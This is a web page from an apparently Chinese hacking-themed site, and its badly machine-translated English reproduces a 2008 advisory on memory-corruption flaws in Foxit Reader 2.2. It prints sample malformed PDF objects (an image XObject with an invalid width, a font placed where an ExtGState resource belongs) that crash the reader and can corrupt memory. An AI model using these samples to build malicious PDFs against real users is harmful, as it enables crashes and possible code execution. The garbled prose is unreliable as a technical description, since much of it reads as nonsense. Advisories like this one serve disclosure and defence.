Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > crack analyzes > Content
Hot Articles
GE-Fanuc CIMPLICITY w32r
CA BrightStor ARCserve B
Apple iPhone Passcode Lo
Apple iPhone Passcode Lo
BitTorrent and uTorrent
FoosunCMS Sql Injection
KMail password encryptio
Rainbow awareness tool t
IE7 0Day crack analysis
Roams through three secu
Discuz! NT 2.5 pour into
Cracking the password pr
Ghost has the crack mirr
phpinfo cross station sc
Tomcat crack's analysis
Recommend Articles
Roams through three secu
FoosunCMS Sql Injection
In PHPCMS2.4 an interest
World browser local xss
Z-blog cross station scr
About XSS crack another
hzhost hypothesized main
php the escapeshellcmd m
Thunderclap ActiveX cont
360 security browser loc
The third party browser
The careful character re
Maxthon roams through br
Yahoo! Statistical funct
Using sohu website URL s
New Articles
The H?to half of all mal
Capital protects eyes cr
Agents of the secret net
fingerPIN launches multi
Tips to supply household
OCS Resolution Security
Spyware attacks tripled
Drink and drug driving c
Forgot your password?has
PKWARE PartnerLink membe
Masternaut provides live
Troj / Erazer-A Trojan i
Hacker of 21?Years old,
Free Firefox anti-phishi
Cyber-criminals are not
Foxit Reader PDF document analysis memory destruction crack
  Add date: 07/18/2008   Publishing date: 07/18/2008   Hits: 61

Is affected the system:
Foxit Foxit Reader 2.2
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 28890

Foxit Reader is a section of small PDF documents examination and the print. program.

Foxit the Reader processing contains has when the abnormal /XObject resources homepage has the crack, the user when processes the malicious document will cause Foxit the Reader collapse.

When used Foxit the Reader revolving contained has the abnormal /XObject resources homepage (or to page increased the /Rotate field):

4 0 obj

<< /Type /Page

/Parent 3 0 R

/Rotate 170

/Contents [25 0 R]

/Resources <<

/ProcSet [/PDF /Text /ImageB /ImageC]

/XObject <</Im23 23 0 R>>/Font << /TT3 33 0 R >>>>

>>

endobj

 

23 0 obj

<</Length 11643/Filter/DCTDecode/Width -28986631481/Height 5/BitsPerComponent 8/ColorSpace/DeviceRGB/Type/#6eject/Name/&#141; #4825#6#25n#00°#6e#6en#25n#72&Acirc; &#402; &Eacute; #25n&#8482; #r3/Subtype/Image>>

stream

........................

endstream

endobj

If revised the width and highly the field, Foxit invalid will write visit to each kind of memory address execution.

When the analysis abnormal /ExtGState resources also has the memory destruction crack. In this case used the /Font resources to replace the ExtGState resources, but the resources type was still ExtGState:

261 0 obj

<</Type /Page /Parent 126 0 R /MediaBox [0 0 259 408] /CropBox [0 0 531 666] /Resources <</ProcSet [/PDF /Text] /ExtGState <</R7 7 0 R>>>> /Contents [20 0 R] >>

endobj

 

7 0 obj

<</FirstChaaa 1

/Type /Funt /FontDescriptor 23 0 R

/BaseFont /xxxxxxxxxxxxxxxxoman, Italic

/Subtype /TrueType

/Encoding /WinAnsiEncoding

/LaitChar 211

/Wodths [    ]

>>

endobj

 

23 0 obj

<</zzz9&eth; E /oooooo >>

endobj

Some functions analyze any resources type any field, when therefore under the /ExtGState resources has the /Font field, still will read and explains these fields, causes structure which fills with the wrong data assigns.

<* origin: Javier Vicente Vallejo
 
  Link: http://www.vallejo.cc/proyectos/foxitreader1.htm
        http://www.vallejo.cc/proyectos/foxitreader2.htm
        http://secunia.com/advisories/29934/
*>

Suggested:
--------------------------------------------------------------------------------
Manufacturer patch:

Foxit
-----
At present the manufacturer has not provided the patch or the promotion procedure, we suggested that uses this software's user momentarily to pay attention to the manufacturer the main page to gain the newest edition:

http://www.foxitsoftware.com/pdf/rd_intro.php
Prev:F2blog XMLRPC uploads the random document crack Next:90% IE cracks

Comment:

Category: Home > crack analyzes
Home